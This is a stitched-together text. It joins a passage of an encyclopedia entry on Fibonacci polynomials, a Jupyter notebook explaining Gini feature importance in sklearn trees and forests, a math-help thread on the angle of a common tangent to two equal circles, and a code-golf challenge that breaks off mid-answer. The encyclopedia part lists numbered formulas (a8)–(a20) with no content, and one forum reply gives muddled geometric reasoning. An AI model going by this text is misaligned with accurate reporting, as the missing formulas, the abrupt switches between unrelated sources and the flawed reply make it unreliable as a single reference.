W.A. Webb and E.A. Parberry [a14] showed that the $F_n(x)$ are irreducible polynomials over the ring of integers if and only if $n$ is a prime number (cf. also Irreducible polynomial). They also found that $x_k = 2i\cos(k\pi/n)$, $k = 1, \dots, n-1$, are the roots of $F_n(x)$ (see also [a2]). M. Bicknell [a1] proved that $F_m(x)$ divides $F_n(x)$ if and only if $m$ divides $n$. V.E. Hoggatt Jr. and C.T. Long [a3] introduced the bivariate Fibonacci polynomials $u_n(x,y)$ by the recursion
(a7) $u_1(x,y) = 1$, $u_2(x,y) = x$, and $u_{n+1}(x,y) = x\, u_n(x,y) + y\, u_{n-1}(x,y)$ for $n \geq 2$,
and they showed that the $u_n(x,y)$ are irreducible over the rational numbers if and only if $n$ is a prime number. They also generalized (a5) and proved that
(a8)
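As a concrete illustration of the recurrence (a1), here is a small Python sketch (my own, not part of this entry) that builds the coefficient lists of $F_n(x)$ and checks that evaluating at $x = 1$ recovers the Fibonacci numbers:

    def fib_poly(n):
        """Coefficients of F_n(x), lowest degree first, via (a1)."""
        if n == 1:
            return [1]
        prev, cur = [1], [0, 1]  # F_1(x) = 1, F_2(x) = x
        for _ in range(n - 2):
            nxt = [0] + cur                # multiply F_n(x) by x ...
            for i, c in enumerate(prev):   # ... and add F_{n-1}(x)
                nxt[i] += c
            prev, cur = cur, nxt
        return cur

    # F_n(1) gives the Fibonacci numbers 1, 1, 2, 3, 5, 8, 13, 21
    print([sum(fib_poly(n)) for n in range(1, 9)])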
In a series of papers, A.N. Philippou and his associates (cf. [a5], [a6], [a7], [a8], [a9], [a10], [a11], [a12], [a13]) introduced and studied Fibonacci, Fibonacci-type and multivariate Fibonacci polynomials of order $k$, and related them to probability and reliability. Let $k$ be a fixed positive integer greater than or equal to $2$. The Fibonacci polynomials of order $k$ are defined by
(a9)
For $k = 2$ these reduce to the Fibonacci polynomials $F_n(x)$, and for $x = 1$ these reduce to the Fibonacci numbers of order $k$ (cf. [a11]). Deriving and expanding the generating function of these polynomials, they [a12] obtained the following generalization of (a6) in terms of the multinomial coefficients (cf. Multinomial coefficient):
(a10)
where the sum is taken over all non-negative integers $n_1, \dots, n_k$ such that $n_1 + 2n_2 + \cdots + kn_k = n$. They also obtained a simpler formula in terms of binomial coefficients. As a byproduct of (a10), they were able to relate these polynomials to the number of trials until the occurrence of the $k$th consecutive success in independent trials with success probability $p$. For $k = 2$ this formula reduces to
(a11)
The Fibonacci-type polynomials of order $k$, defined by
(a12)
have simpler multinomial and binomial expansions than the Fibonacci polynomials of order $k$. The two families of polynomials are related by
(a13)
Furthermore,
(a14)
Assuming that the components of a consecutive-$k$-out-of-$n$:F system are ordered linearly and function independently with probability $p$, Philippou [a6] found that the reliability of the system is given by
(a15)
If the components of the system are ordered circularly, then its reliability is given by (cf. [a10])
(a16)
Next, denote by $N$ the number of independent trials with success probability $p$ until the $r$th occurrence of $k$ consecutive successes. It is well-known [a5] that $N$ has the negative binomial distribution of order $k$ with parameters $r$ and $p$. Philippou and C. Georghiou [a9] have related this probability distribution to the $r$-fold convolution of the Fibonacci-type polynomials of order $k$ with themselves, as follows:
(a17)
which reduces to (a14) for $r = 1$, and they utilized relation (a17) effectively for deriving two useful expressions, a binomial one and a recurrence one, for calculating the above probabilities.
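To make the distribution concrete, here is a small Python sketch (my own, not part of this entry) that simulates the waiting time until the first run of $k$ consecutive successes; summing $r$ independent copies gives a draw from the negative binomial distribution of order $k$ with parameters $r$ and $p$:

    import random

    def trials_until_k_run(k, p):
        """Number of Bernoulli(p) trials until the first run of k successes."""
        run = trials = 0
        while run < k:
            trials += 1
            run = run + 1 if random.random() < p else 0
        return trials

    # one draw with r = 3, k = 2, p = 0.5 (values chosen arbitrarily)
    sample = sum(trials_until_k_run(2, 0.5) for _ in range(3))
    print(sample)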
Let $x_1, \dots, x_k$ be real variables. The multivariate Fibonacci polynomials of order $k$ (cf. [a8]) are defined by the recurrence
(a18)
For suitable specializations of the variables these reduce to the Fibonacci and Fibonacci-type polynomials of order $k$. These polynomials have the following multinomial expansion:
(a19)
where the sum is taken over all non-negative integers $n_1, \dots, n_k$ such that $n_1 + 2n_2 + \cdots + kn_k = n$. Let the random variable $X$ be distributed as a multi-parameter negative binomial distribution of order $k$ (cf. [a7]). Philippou and D.L. Antzoulakos [a8] showed that the $r$-fold convolution of the multivariate Fibonacci polynomials of order $k$ with themselves is related to this distribution by
(a20)
Furthermore, they have effectively utilized relation (a20) in deriving a recurrence for calculating the above probabilities.
#### References
[a1] M. Bicknell, "A primer for the Fibonacci numbers VII", Fibonacci Quart., 8 (1970), pp. 407–420
[a2] V.E. Hoggatt Jr., M. Bicknell, "Roots of Fibonacci polynomials", Fibonacci Quart., 11 (1973), pp. 271–274
[a3] V.E. Hoggatt Jr., C.T. Long, "Divisibility properties of generalized Fibonacci polynomials", Fibonacci Quart., 12 (1974), pp. 113–120
[a4] E. Lucas, "Théorie des fonctions numériques simplement périodiques", Amer. J. Math., 1 (1878), pp. 184–240; 289–321
[a5] A.N. Philippou, "The negative binomial distribution of order k and some of its properties", Biom. J., 26 (1984), pp. 789–794
[a6] A.N. Philippou, "Distributions and Fibonacci polynomials of order k, longest runs, and reliability of consecutive-k-out-of-n:F systems", in A.N. Philippou, G.E. Bergum, A.F. Horadam (eds.), Fibonacci Numbers and Their Applications, Reidel (1986), pp. 203–227
[a7] A.N. Philippou, "On multiparameter distributions of order k", Ann. Inst. Statist. Math., 40 (1988), pp. 467–475
[a8] A.N. Philippou, D.L. Antzoulakos, "Multivariate Fibonacci polynomials of order k and the multiparameter negative binomial distribution of the same order", in G.E. Bergum, A.N. Philippou, A.F. Horadam (eds.), Applications of Fibonacci Numbers, 3, Kluwer Acad. Publ. (1990), pp. 273–279
[a9] A.N. Philippou, C. Georghiou, "Convolutions of Fibonacci-type polynomials of order k and the negative binomial distributions of the same order", Fibonacci Quart., 27 (1989), pp. 209–216
[a10] A.N. Philippou, F.S. Makri, "Longest circular runs with an application in reliability via the Fibonacci-type polynomials of order k", in G.E. Bergum, A.N. Philippou, A.F. Horadam (eds.), Applications of Fibonacci Numbers, 3, Kluwer Acad. Publ. (1990), pp. 281–286
[a11] A.N. Philippou, A.A. Muwafi, "Waiting for the kth consecutive success and the Fibonacci sequence of order k", Fibonacci Quart., 20 (1982), pp. 28–32
[a12] A.N. Philippou, C. Georghiou, G.N. Philippou, "Fibonacci polynomials of order k, multinomial expansions and probability", Internat. J. Math. Math. Sci., 6 (1983), pp. 545–550
[a13] A.N. Philippou, C. Georghiou, G.N. Philippou, "Fibonacci-type polynomials of order k with probability applications", Fibonacci Quart., 23 (1985), pp. 100–105
[a14] W.A. Webb, E.A. Parberry, "Divisibility properties of Fibonacci polynomials", Fibonacci Quart., 7 (1969), pp. 457–463
How to Cite This Entry:
Fibonacci polynomials. Andreas N. Philippou (originator), Encyclopedia of Mathematics. URL: http://www.encyclopediaofmath.org/index.php?title=Fibonacci_polynomials&oldid=14185
This text originally appeared in Encyclopedia of Mathematics - ISBN 1402006098
In [189]:
from sklearn.datasets import load_boston, load_iris
from sklearn.externals.six import StringIO
import pydot
import matplotlib
import pandas as pd
from sklearn.tree import DecisionTreeRegressor, DecisionTreeClassifier, export_graphviz
from sklearn.cross_validation import train_test_split, cross_val_score
%matplotlib inline
matplotlib.style.use('ggplot')
Introduction¶
In this notebook I'm reviewing heuristics for ranking features in decision trees and random forests, and their implementation in sklearn. In the text I sometimes use variable as a synonym of feature. Feature selection is a step embedded in the process of growing decision trees. An attractive side effect is that once the model is built, we can retrieve the relative importance of each feature in the decision-making process. This not only increases the general interpretability of the model, but can help both in exploratory data analysis and in feature engineering pipelines. A nice example of how tree-based models can be used to improve feature engineering can be found in the winner recap notes of the Criteo Kaggle competition (http://machine-learning-notes.blogspot.nl/2014/12/kaggle-criteo-winner-method-recap.html).
Tree-based models, and ensembles of trees, are very powerful and well understood methods for supervised learning. Ensembles such as Random Forests are robust and stable methods for both classification and regression, while decision trees allow for conceptually simple and easily interpretable models. For an overview of tree models for classification and regression in sklearn, there is an excellent talk by Gilles Louppe at PyData Paris 2015 (http://www.slideshare.net/glouppe/slides-46767187). A well regarded paper from the same author that provides a thorough analysis of the mathematics of feature selection in tree ensembles is "Understanding variable importances in forests of randomized trees" (Louppe et al. 2014). With this notebook I'm attempting to fill some gaps and bridge the literature review to the implementation (sklearn).
Data¶
In [190]:
boston = load_boston()
iris = load_iris()  # also load Iris here; it is used in the classification examples below
Tree models for regression and classification¶
Tree-based models are non-parametric methods that recursively partition the feature space into rectangular disjoint subsets, and fit a model in each of them. Assuming the space is partitioned into M regions, a regression tree would predict a response $Y$ given inputs $X = \{x_1, x_2, .. x_n\}$ as $$f(x_i) = \sum\limits_{m=1}^M c_mI(x_i\in R_m)$$ where $I$ is the indicator function and $c_m$ a constant that models $Y$ in region $R_m$. This model can be represented by a tree that has $R_1..R_m$ as its terminal nodes. In both the regression and classification cases, the algorithm decides the splitting variables, the split points, and the tree topology. Essentially, at each split point the algorithm performs a feature selection step using a heuristic to estimate information gain; this is represented by a numerical value known as the Gini importance of a feature (not to be confused with the Gini index!). We can exploit this very same process to rank features (feature engineering) and to explain their importance with regard to the models we want to learn from data.
The main difference between the regression and classification case is the criterion employed to evaluate the quality of a split when growing a tree. Regardless of this aspect, in sklearn, the importance of a variable is calculated as the Gini Importance or "mean decreased impurity" (http://stackoverflow.com/questions/15810339/how-are-feature-importances-in-randomforestclassifier-determined). See "Classification and regression trees" (Breiman, Friedman, 1984).
Gini importance (MDI) of a variable¶
Gini importance, or mean decreased impurity, is defined as the total decrease in node impurity at split $s$ of node $n$, for some impurity function $i(n)$. That is $$\Delta i(s, n) = i(n) - p_L i(n_L) - p_R i(n_R)$$ where $p_L$ and $p_R$ are the proportions of $N_L$ and $N_R$ samples in the left and right splits, over the total number of samples $N_n$ for node $n$.
Under the hood, sklearn calculates MDI as follows:
cdef class Tree:
[...]
cpdef compute_feature_importances(self, normalize=True):
[...]
while node != end_node:
if node.left_child != _TREE_LEAF:
# ... and node.right_child != _TREE_LEAF:
left = &nodes[node.left_child]
right = &nodes[node.right_child]
importance_data[node.feature] += (
node.weighted_n_node_samples * node.impurity -
left.weighted_n_node_samples * left.impurity -
right.weighted_n_node_samples * right.impurity)
node += 1
importances /= nodes[0].weighted_n_node_samples
[...]
This method looks at a node and its left and right children. A list of split variables (node.feature objects) and the associated importance scores is kept in importance_data. The node impurity is weighted by the probability of reaching that node, approximated by the proportion of samples (weighted_n_node_samples) reaching that node.
node.weighted_n_node_samples * node.impurity -
left.weighted_n_node_samples * left.impurity -
right.weighted_n_node_samples * right.impurity
The impurity criteria are defined by implementations of the Criterion interface. For classification trees, the impurity criteria are Entropy (cross entropy) and Gini (the Gini index). For regression trees the impurity criterion is MSE (mean squared error).
Regression trees¶
As said, sklearn.tree.DecisionTreeRegressor uses mean squared error (MSE) to determine the quality of a split; that is, an estimate $\hat{c}_m$ for $c_m$ is calculated so as to minimize the sum of squares $\sum (y_i - \hat{f}(x_i))^2$, with $y_i$ being the target variable and $\hat{f}(x_i)$ its predicted value. The best estimator (the minimizer of the sum of squares within each region) is obtained by taking $\hat{f}({x_i}) = avg(y_i | x_i \in R_m)$. By bias-variance decomposition of the squared error, we have $Var[\hat{f}(x_i)] = E[(\hat{f}(x_i) - E[\hat{f}(x_i)])^2]$. So, for a split node, the mean squared error can then be calculated as the sum of the variances of the left and right splits: $MSE = Var_{left} + Var_{right}$.
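To make the split-quality computation tangible, here is a small standalone sketch of the weighted impurity decrease under the variance (MSE) criterion (my own code, mirroring but not copied from sklearn); mask marks the samples routed to the left child, and both children are assumed non-empty:

    import numpy as np

    def impurity_decrease(y, mask):
        """Delta i(s, n) = i(n) - p_L * i(n_L) - p_R * i(n_R), with variance as i."""
        y = np.asarray(y, dtype=float)
        mask = np.asarray(mask, dtype=bool)
        n = float(len(y))
        p_left, p_right = mask.sum() / n, (~mask).sum() / n
        return y.var() - p_left * y[mask].var() - p_right * y[~mask].var()

    # a split that separates small targets from large ones scores highly
    print(impurity_decrease([1.0, 1.2, 9.8, 10.0], [True, True, False, False]))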
In [92]:
# To keep the diagram tractable, restrict the tree to at most 5 leaf nodes
reg = DecisionTreeRegressor(max_leaf_nodes=5)
reg.fit(boston.data, boston.target)
dot_data = StringIO()
export_graphviz(reg, out_file="/tmp/tree.dot",
feature_names=boston.feature_names)
# pydot.graph_from_dot_data is broken in my env
!dot -Tpng /tmp/tree.dot -o /tmp/tree.png
from IPython.display import Image
Image(filename='/tmp/tree.png')
Out[92]:
In the example above, with 5 terminal nodes, we identify three split variables: RM, DIS and LSTAT. For each non terminal node, the diagram shows the split variables and split value, the MSE and the number of datapoints (samples) contained in the resulting partitioned region. Terminal nodes, on the other hand, report the value for the response we want to predict. We can retrieve the Gini importance of each feature in the fitted model with the feature_importances_ property.
In [179]:
reg = DecisionTreeRegressor(max_leaf_nodes=5)
reg.fit(boston.data, boston.target)
plt = pd.DataFrame(zip(boston.feature_names, reg.feature_importances_),
columns=['feature', 'Gini importance']).plot(kind='bar', x='feature')
_ = plt.set_title('Regression tree on the Boston dataset (5 leaf nodes)')
Things become a bit more interesting when we grow larger trees.
In [180]:
reg = DecisionTreeRegressor()
reg.fit(boston.data, boston.target)
plt = pd.DataFrame(zip(boston.feature_names, reg.feature_importances_),
columns=['feature', 'Gini importance']).plot(kind='bar', x='feature')
_ = plt.set_title('Regression tree on the Boston dataset')
Classification trees¶
Assume a classification task where the target classes take values in $0,1,...,K-1$. If node $m$ represents a region $R_m$ with $N_m$ observations, then let $p_{mk} = \frac{1}{N_m} \sum_{x_i \in R_m} I(y_i = k)$ be the proportion of class $k$ observations in node $m$. sklearn.tree.DecisionTreeClassifier allows two impurity criteria for determining splits in such a setting. On the Iris dataset the two criteria agree on which features are important. Experimental results suggest that for tree induction purposes both impurity measures generally lead to similar results (Tan et al., Introduction to Data Mining). This is not entirely surprising, given that both measures are particular cases of the Tsallis entropy $H_\beta = \frac{1}{\beta-1}(1 - \sum_{k=0}^{K-1} p^{\beta}_{mk})$. The Gini index corresponds to $\beta=2$, while cross entropy is recovered by taking $\beta \rightarrow 1$.
Cross entropy might give higher scores to balanced partitions when there are many classes, though; see "Technical Note: Some Properties of Splitting Criteria" (Breiman, 1996). On the other hand, working in log scale might introduce computational overhead.
Gini Index¶
The Gini index is defined as $\sum_{k=0}^{K-1} p_{mk} (1 - p_{mk}) = 1 - \sum_{k=0}^{K-1} p_{mk}^2$. It is a measure of statistical dispersion commonly used to quantify inequality among values of frequency distributions. An interpretation of the Gini index is popular in the social sciences as a way to represent levels of income (http://en.wikipedia.org/wiki/Gini_coefficient) of a nation's residents; in that setting it is derived from the area under the Lorenz curve (http://en.wikipedia.org/wiki/Lorenz_curve).
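As a quick illustration (my own snippet, not sklearn's implementation), the node impurity $1 - \sum_k p_{mk}^2$ can be computed directly from the labels reaching a node:

    import numpy as np

    def gini(labels):
        """Gini index of a node: 1 - sum_k p_k^2 over the class proportions."""
        _, counts = np.unique(labels, return_counts=True)
        p = counts / float(counts.sum())
        return 1.0 - np.sum(p ** 2)

    print(gini([0, 0, 1, 1]))  # 0.5, maximally impure for two classes
    print(gini([1, 1, 1, 1]))  # 0.0, a pure node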
In [187]:
cls = DecisionTreeClassifier(criterion='gini', splitter='best')
est = cls.fit(iris.data, iris.target)
zip(iris.feature_names, cls.feature_importances_)
plt = pd.DataFrame(zip(iris.feature_names, cls.feature_importances_),
columns=['feature', 'Gini importance']).plot(kind='bar', x='feature')
_ = plt.set_title('Classification tree on the Iris dataset (criterion=gini)')
Cross Entropy¶
Cross-entropy is defined as $- \sum_{k=0}^{K-1} p_{mk} \log(p_{mk})$. Intuitively, it tells us the amount of information contained at each split node.
In [185]:
cls = DecisionTreeClassifier(criterion='entropy', splitter='best')
est = cls.fit(iris.data, iris.target)
zip(iris.feature_names, cls.feature_importances_)
plt = pd.DataFrame(zip(iris.feature_names, cls.feature_importances_),
columns=['feature', 'Gini importance']).plot(kind='bar', x='feature')
_ = plt.set_title('Classification tree on the Iris dataset (criterion=entropy)')
Both DecisionTreeRegressor and DecisionTreeClassifier accept parameters that influence the shape of a tree, and hence the topology of the partitioned feature space. These parameters allow setting thresholds on the number of features per split and the tree depth. Once the process for growing trees is understood, the sklearn documentation should be pretty much straightforward. A parameter worth mentioning is random_state, which controls the randomization of sampling at each split. If we set this parameter to a constant, we are guaranteed to produce the same splits for each run of the algorithm.
Ensemble methods¶
Trees lead to very interpretable models, which are trivial to visualize. On the one hand this property makes them very attractive as a means of "communicating" predictive models to a non-technical audience. On the other hand, they usually result in low-bias, high-variance models. To control variance, we can combine the predictions of several trees into a single model. At the time of writing sklearn ships with two tree ensemble methods: Random Forest (Breiman, 2001) and Extremely Randomized Trees (Geurts et al., 2006). Both methods extend the ideas of bootstrap aggregation or "bagging" (Breiman, 1996), that is, sampling a training set with replacement to obtain $m$ datasets (bootstrap sets) and combining the outputs of the $m$ models fit on each sampled set.
Random Forest¶
Random Forest brings bagging to the feature selection step. $N$ trees are grown on bootstrapped datasets; then, before each split, the algorithm randomly picks $m \leq p$ variables as candidates for splitting. The best candidate is picked according to a heuristic, and the node is split into left/right children. After $N$ such trees are grown, the algorithm combines their predictions. In the case of regression trees, this means averaging the output of the ensemble of models as: $f_{rf}(x) = \frac{1}{N} \sum_{n=1}^{N} f_n (x)$. For classification forests, a common combination strategy is majority voting. A common value for $m$ is $\sqrt{p}$, the intuition being that small values of $m$ reduce the correlation between pairs of trees, and hence reduce the variance of the ensemble.
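For instance, a minimal sketch using the Boston data loaded above (the hyperparameter values here are arbitrary choices for illustration):

    from sklearn.ensemble import RandomForestRegressor

    rf = RandomForestRegressor(n_estimators=100, max_features='sqrt', random_state=0)
    rf.fit(boston.data, boston.target)
    # Gini importances (mean decrease in impurity), averaged over the forest
    for name, score in sorted(zip(boston.feature_names, rf.feature_importances_),
                              key=lambda t: -t[1]):
        print('{}: {:.3f}'.format(name, score))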
Regression and classification with Random Forests¶
sklearn.ensemble.RandomForestRegressor and sklearn.ensemble.RandomForestClassifier are interfaces for building ensembles of DecisionTreeRegressor and DecisionTreeClassifier respectively. The criteria for determining node impurity are the same as we've seen before: mse for regression trees and gini or entropy for classification trees. The logic for growing and combining the ensemble output is implemented in the ForestRegressor and ForestClassifier base classes in sklearn.ensemble.
oob_score¶
Random Forest is known to be a robust classifier that does not easily overfit; the authors claim no need for cross-validation or even a test set for model selection (https://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm#features). An estimate of the generalization error can be obtained as part of the algorithm run, by leaving out a portion of the bootstrap dataset used for fitting each tree and using the data points left out by the trees to assemble a test set across the $N$ trees. That is, by building an out-of-bag test set on the go. This behaviour is controlled by the boolean oob_score parameter. On a fitted model, the oob_score_ attribute will then report the error estimate for the ensemble.
In sklearn the out-of-bag error is calculated in _set_oob_score in ForestRegressor and ForestClassifier. For regression trees, the oob score is expressed as the sum of the $R^2$ of each predictor on the oob dataset, averaged over the number of predictors. For classification trees, it is the vote given by each predictor's oob_decision_function, which for a forest of $k$ trees is a list of
decision = (predictions[k] /
predictions[k].sum(axis=1)[:, np.newaxis])
where predictions[k] is the sum of class probabilities predicted by the predict_proba(X) method, for some test input $X$, which for a single tree $k$ is the fraction of samples of the same class in a leaf.
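A minimal usage sketch (again with arbitrary hyperparameters), using the Iris data loaded earlier:

    from sklearn.ensemble import RandomForestClassifier

    clf = RandomForestClassifier(n_estimators=200, oob_score=True, random_state=0)
    clf.fit(iris.data, iris.target)
    print(clf.oob_score_)  # accuracy estimated on the out-of-bag samples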
Interpretability of random forests¶
With Random Forest we lose the capability of visualizing the model as a single decision tree diagram. However, we can still access the feature importance vector for the whole fitted ensemble with the feature_importances_ property. This is computed as
sum(all_importances) / len(self.estimators_)
Extra trees¶
sklearn allows Extremely Randomized Trees to be used instead of Decision Trees to compose an ensemble. I won't cover the workings of ExtraTrees in this notebook. For a very concise comparison see http://stackoverflow.com/questions/22409855/randomforestclassifier-vs-extratreesclassifier-in-scikit-learn
Categorical features¶
In the toy examples above, I've dealt only with numerical features. Fitting models with categorical variables might be a bit confusing if you come from environments like R, where the most common implementations are either able to handle categorical variables natively, or take care of encoding them. In sklearn, a bit more work is necessary to encode categorical variables, using e.g. the hashing trick (sklearn.feature_extraction.FeatureHasher) or one-hot encoding (sklearn.preprocessing.OneHotEncoder). Alternatively, Pandas provides the convenient get_dummies() function.
Surprisingly, to me at least, when growing trees on large datasets sklearn behaves well even with integer encodings of categorical features. See https://stackoverflow.com/questions/15821751/how-to-use-dummy-variable-to-represent-categorical-data-in-python-scikit-learn-r and https://github.com/szilard/benchm-ml/issues/1
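For example, a toy sketch (the column names here are made up):

    import pandas as pd

    df = pd.DataFrame({'color': ['red', 'green', 'red', 'blue'],
                       'y':     [1, 0, 1, 0]})
    X = pd.get_dummies(df[['color']])  # expands to color_blue, color_green, color_red
    print(X.columns.tolist())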
# Math Help - Line tangent to 2 equal circles
1. ## Line tangent to 2 equal circles
Hey guys,
I need to find the angle shown in the picture below. I know the radius of both circles (they are the same) and I know the distance between the two circles.
I am baffled as to how I should approach this!
2. I'm always a fan of Brute Force.
Put your circles on a set of coordinate axes, one circle (radius r and center (0,0)) at the origin and the other (radius R and center (a,0)) on the positive x-axis.
Points on the origin circle look like this: (b,c) where $b^{2} + c^{2} = r^{2}$
Points on the remote circle look like this: (d,e) where $(d-a)^{2} + e^{2} = R^{2}$
Just to emphasize that the circles do not intersect, let's also define f > 0 so that a = r + f + R
The line has equation $y-e = \frac{e-c}{d-b}(x-d)$
You can use calculus or algebra to show that the line is perpendicular to a radius at the points of tangency.
$\frac{e-c}{d-b} = -\frac{b}{c}$ and $\frac{e-c}{d-b} = -\frac{d}{e}$
That's enough information to find the points. The angles aren't too tricky after that. Let's see what you get. It will be fun!
Note: I have no doubt there is an elegant way to do this, like ticbol's geometry solution. I couldn't do that because I did not use the fact that the radii were the same; my solution is more general. If nothing else, this little demonstration should encourage you that you ALWAYS should be able to find SOME approach. It may be ugly, but it's better than the frustration inherent in just staring at it. Once you have the solution, you can search for elegance.
3. Originally Posted by VooDoo
Hey guys,
I need to find the angle shown in the picture below. I know the radius of both circles (they are the same) and I know the distance between the two circles.
I am baffled as to how I should approach this!
Whether the centers of the two circles are on the same horizontal line or not, the solution will be the same.
The common tangent line is perpendicular to the radii of both circles at the points of tangency.
Given or known:
>>>radius of both circles is, say, r.
>>>distance between the two centers is, say, d.
Draw the d.
The slant line or the common tangent line bisects the d.
Two similar and congruent right triangles are formed.
Each one has a leg of r and a hypotenuse of d/2.
The angle we are solving for, the central angle, is included in these two known sides.
So,
cos(theta) = r / (d/2)
cos(theta) = 2r/d
Therefore, theta = arccos(2r/d).
4. Originally Posted by VooDoo
Hey guys,
I need to find the angle shown in the picture below. I know the radius of both circles (they are the same) and I know the distance between the two circles.
I am baffled as to how I should approach this!
OK, I assume that the angle you are referring to is the angle formed between the two radii.
You also said that the following is known:
• the radius of both circles, which you said are the same, which implies that the two circles have the same shape, i.e. same area, circumference, etc.
• the distance between the two circles
So what you need to do is complete the diagram first: connect the distance between the 2 circles via a straight line to their radii. (Also, the tangent cuts this line (the distance between the 2 circles) in half, so the two halves are equidistant.)
Therefore the angles we are required to find become alternate angles, which are equal in size.
Furthermore, we know the theorem which states that a radius is perpendicular to a tangent at the point of contact.
Based on the above info you should now be able to form a triangle, whose two sides are known (one of them the radius, and the other the radius plus half the distance between the 2 circles), as well as the perpendicular angle (90 degrees).
Thus, using the sine rule
$\frac{a}{\sin A} = \frac{b}{\sin B}$, substitute the values above and hence find the size of the required angle.
5. Hello, VooDoo!
I need to find the angle shown in the picture below.
I know the radius of both circles (they are the same)
and I know the distance between the two circles.
Code:
o * B
* θ |
o* |
* o |r
C E * o |
o o * * * * * * * * * * * o o
| o * D
r| o *
| *o
|θ *
A * o
The circles have centers at A and B.
The radius is: . $AC \,=\, BD \,=\, r$
The line joining the centers is $AB \,= \,d$
The common tangent is $CD$
They intersect at $E.$
Right triangles ACE and BDE are congruent.
. . Hence: . $AE \,=\,EB \,=\,\frac{1}{2}d$ .and . $\theta \,=\,\angle CAE \,=\,\angle DBE$
In right triangle $ACE\!:\;\;\cos\theta \:=\:\frac{AC}{AE} \:=\:\frac{r}{\frac{1}{2}d}$
Therefore: . $\theta \;=\;\arccos\left(\frac{2r}{d}\right)$
Ahhh, ticbol beat me to it!
.
6. Originally Posted by ticbol
Two similar and congruent right triangles are formed.
Each one has a leg of r and a hypotenuse of d/2.
lol, silly me, I proceeded to use the sine rule instead of Pythagoras' theorem when it was so obvious. But I guess either way should end up with the same answer.
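(For a quick numerical sanity check of theta = arccos(2r/d), here is a small Python sketch with made-up values r = 3, d = 10:)

    import math

    r, d = 3.0, 10.0                 # radius and distance between the centers
    theta = math.acos(2 * r / d)     # the angle from ticbol's / Soroban's derivation
    print(math.degrees(theta))       # ~53.13 degrees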
# More is less and less is more
Anybody can make the output of a program bigger by adding characters, so let's do the exact opposite.
Write a full program, an inner function or a snippet for a REPL environment in a language of your choice that satisfies the following criteria:
1. Your code must be at least 1 character long.
2. Running the original code produces x characters of output to STDOUT (or closest alternative), where 0 ≤ x < +∞.
3. Removing any arbitrary single character from the original code results again in valid code, which produces at least x + 1 characters of output to STDOUT.
4. Neither the original code nor the modifications may produce any error output, be it to STDOUT, STDERR, syslog or elsewhere. The only exceptions to this rule are compiler warnings.
Your program may not require any flags or settings to suppress the error output.
Your program may not contain any fatal errors, even if they don't produce any output.
5. Both the original code and the modifications must be deterministic and finish eventually (no infinite loops).
6. Neither the original code nor the modifications may require input of any kind.
7. Functions or snippets may not maintain any state between executions.
Considering that this task is trivial in some languages and downright impossible in others, this is a popularity-contest.
When voting, please take the "relative shortness" of the code into account, i.e., a shorter answer should be considered more creative than a longer answer in the same language.
• While the 1 byte solution is impressive, it would be more impressive to see who can come up with the highest ratio of x:x+n. i.e. the length of normal output compared to the average length of output when any one character is removed. Adds an extra challenge to this question in my opinion. Jun 24 '15 at 2:49
• @FizzBuzz Easy: 111111111111111111^111111111111111111 (if you meant the lowest ratio). Jun 24 '15 at 12:30
• Aw, just noticed 'no infinite loops.' I was working on creating a ><> program that would create output faster if an one character was removed, such that after a constant k instructions, the output of each program is strictly greater than the output of the original from then on (because the other programs would loop faster or output more each loop). It was looking pretty interesting. Maybe I'll see if I can finish it anyway, and make another challenge. Jun 24 '15 at 17:28
• An interesting scoring metric for this challenge could be "most unique characters, ties go to shortest length". We would then try to get all the characters in a string literal though. Jul 1 '15 at 23:11
• What is meant by an inner function? Apr 1 '19 at 4:16
# Any REPL with caret XOR operation, 5 bytes
11^11
11^11 is of course 0. The only other possibilities are 1^11 or 11^1 which are 10, or 1111 which produces itself.
• Well played, feersum. Well played. Jun 23 '15 at 19:48
• Minus would also do the trick. Jun 23 '15 at 19:49
• Similarly, 99|99 Jun 24 '15 at 3:30
• @Challenger5 -10 is longer than 0. Nov 8 '17 at 8:20
• @MartinEnder Oh, I see. For some reason I thought it had to be a larger number. Nov 8 '17 at 8:25
# TI-BASIC, 3 1
"
When the last line of a program is an expression, the calculator will display that expression. Otherwise, the calculator displays Done when the program finishes. The expression here is the empty string, but it could also work with any one-digit number.
### 2 bytes:
isClockOn
Same as the above but with a 2-byte token.
### 3 bytes:
ππ⁻¹
Prints 1 due to implied multiplication. Can be extended indefinitely by adding pairs of ⁻¹'s. The below also work.
√(25
e^(πi
⁻ii
ii³
2ππ
cos(2π
### Longer solutions:
11/77►Frac
ᴇ⁻⁻44
cos(208341 //numerator of a convergent to pi; prints "-1"
There are probably also multi-line solutions but I can't find any.
• I'm not familar with TI BASIC. Are you counting the sqrt and parenthesis as a single character? Jun 23 '15 at 20:03
• Yes, the sqrt and parenthesis are together a single token, stored as one byte in the calculator's memory and entered with one keypress. Jun 23 '15 at 20:04
• finally a way to stop that annoying Done message! Jun 23 '15 at 20:33
• There is no Done token; the calculator displays Done when finished executing any program without an expression on the last line (including the empty program). Jun 28 '15 at 17:27
# CJam, JavaScript, Python, etc, 18 bytes
8.8888888888888888
The outputs in CJam are:
8.8888888888888888 -> 8.88888888888889
8.888888888888888 -> 8.888888888888888
88888888888888888 -> 88888888888888888
.8888888888888888 -> 0.8888888888888888
JavaScript and Python work in similar ways. It isn't competitive in JavaScript and Python, but it's not easy to find a shorter one in CJam.
• Nice floating-point abuse! Jun 25 '15 at 1:10
# Octave, 5 bytes
10:10
(x : y) gives the array of numbers between x and y in increments of 1, so between 10 and 10 the only element is 10:
> 10:10
ans = 10
When the second argument is less than the first, octave prints the empty matrix and its dimensions:
> 10:1
ans = [](1x0)
> 10:0
ans = [](1x0)
When a character is removed from the first number, there are more elements in the array:
> 1:10
ans = 1 2 3 4 5 6 7 8 9 10
> 0:10
ans = 0 1 2 3 4 5 6 7 8 9 10
When the colon is removed, the number returns itself:
> 1010
ans = 1010
• also valid in R
– mnel
Mar 8 '16 at 10:17
# Microscript, 1 byte
h
This produces no output, as h suppresses the language's implicit printing. Removing the sole character produces a program whose output is 0\n.
I'll try to come up with a better answer later.
EDIT ON NOVEMBER 17:
This also works in Microscript II, with the exception that, instead of yielding 0\n, the empty program yields null.
# Pyth, 3 bytes
cGG
G is preinitialized with the lowercase letters in the alphabet. c is the split-function.
cGG splits the alphabet by occurrences of the alphabet, which ends in ['', ''] (8 bytes).
When the second parameter is missing, c splits the string by whitespaces, tabs or newlines. Since none of them appear in G, the output for cG is ['abcdefghijklmnopqrstuvwxyz'] (30 bytes).
And GG simply prints twice the alphabet on two seperate lines: abcdefghijklmnopqrstuvwxyz\nabcdefghijklmnopqrstuvwxyz (53 bytes).
Try it online: Demonstration
# Python REPL, 6 bytes
Not the shortest, but here's another floating point abuse answer:
>>> 1e308
